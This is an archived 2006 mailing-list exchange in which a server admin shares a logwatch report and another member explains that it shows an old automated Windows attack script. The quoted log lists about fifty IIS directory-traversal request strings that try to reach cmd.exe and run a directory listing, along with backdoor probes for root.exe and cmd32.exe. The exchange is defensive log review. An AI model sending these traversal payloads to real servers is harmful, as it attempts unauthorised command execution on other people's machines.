Article 7106 at 06/09/20 03:24:46 From: darren (at mark) intersys-group.com Subject: [coba-e:07106] Re: Concerned

Index: [Article Count Order] [Thread]
Date:  Wed, 20 Sep 2006 08:24:34 +0100
From:  "Darren Wolfe" <darren (at mark) intersys-group.com>
Subject:  [coba-e:07106] Re: Concerned - anything to worry about??
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
In-Reply-To:  <4510D8C2.1030206 (at mark) planetcentral.net>
X-Mail-Count: 07106

Hi Paul,

Nothing to worry about, just some automated attack script for windows
servers (and quite an old one by the looks of it, this exploit was closed a
long time ago IIRC).  You don't have any of these files on your server and
even if they were they wouldn't execute anyway.

Another day in the life of a machine on the internet i'm afraid!

-----Original Message-----
From: paul [mailto:paul (at mark) planetcentral.net] 
Sent: 20 September 2006 07:00
To: coba-e (at mark) bluequartz.org
Subject: [coba-e:07105] Concerned - anything to worry about??

Checked my logwatch mail this morning and found this - is it anything to 
worry about???
I mean i know they were looking for mostly windows files, but does this 
mean my system's been compromised ????

Thx
Paul

 total of 1 sites probed the server 
  www.mydomain.net 218.92.93.181  

!!!! 50 possible successful probes 
 /cgi-bin/cmd.exe?/c+dir HTTP Response 302 
 /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/root.exe?/c+dir HTTP Response 302 
 /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/cmd32.exe?/c+dir HTTP Response 302 
 /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-Bin/cmd.exe?/c+dir HTTP Response 302 
 /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 



-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.